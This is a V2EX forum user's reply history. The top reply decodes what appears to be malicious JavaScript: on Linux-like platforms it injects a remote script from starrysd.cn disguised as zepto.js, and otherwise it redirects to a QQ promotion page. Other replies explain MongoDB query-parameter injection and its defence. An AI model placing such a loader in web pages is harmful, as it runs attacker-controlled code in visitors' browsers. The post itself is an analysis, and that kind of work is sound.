V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  nullzz  ›  全部回复第 1 页 / 共 1 页
回复总数  8
解个密

```

function t(e) {
var t = document.createElement("script");
var n = document.getElementsByTagName("script")[0];
t.src = e,
t.async = !0,
n.parentNode.insertBefore(t, n)
}
function n() {
var e = {
win: false,
mac: false,
xll: false
};
var t = navigator.platform;
e.win = t.indexOf("Win") == 0;
e.mac = t.indexOf("Mac") == 0;
e.x11 = t == "X11" || t.indexOf("Linux") == 0;
if (e.win || e.mac) {
return false;
} else {
return true;
}
}
n() ? t("//starrysd.cn./zepto.js") :window.location.href = "https://act.qzone.qq.com/vip/2018/vip-10th-m?_wv=16778243";

```
2018-10-26 12:27:37 +08:00
回复了 lookforsex 创建的主题 程序员 小米 mix3 发布了,大伙居然没点动静
重量 189,两只手?
mac 地址认证
2017-01-14 19:51:46 +08:00
回复了 DoraJDJ 创建的主题 MongoDB 关于 MongoDB 注入的防御问题
@binux 哈哈,长见识了 KOA 还可以这样
2017-01-14 18:36:17 +08:00
回复了 DoraJDJ 创建的主题 MongoDB 关于 MongoDB 注入的防御问题
看样子我理解有误,有意思,看下这个 http://static.hx99.net/static/bugs/wooyun-2015-0112230.html
2017-01-14 18:22:49 +08:00
回复了 DoraJDJ 创建的主题 MongoDB 关于 MongoDB 注入的防御问题
从 cnodejs 的 mongodb 注入来看, nodejs 和 php 一样支持参数数组传参,即 req.query.id 获取到的值可以是个数组比如请求 index?id[$regex]=1 后端获取到的 id 值为{"$ne": 1}
限制你请求的参数的值只能为字符串,就不可能注入
2016-06-04 10:39:06 +08:00
回复了 tanktanktank 创建的主题 深圳 白石洲 招合租
16 应届生 在科技园工作 20 号左右来深圳可以么?
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2781 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 18ms · UTC 09:36 · PVG 17:36 · LAX 01:36 · JFK 04:36
Developed with CodeLauncher
♥ Do have faith in what you're doing.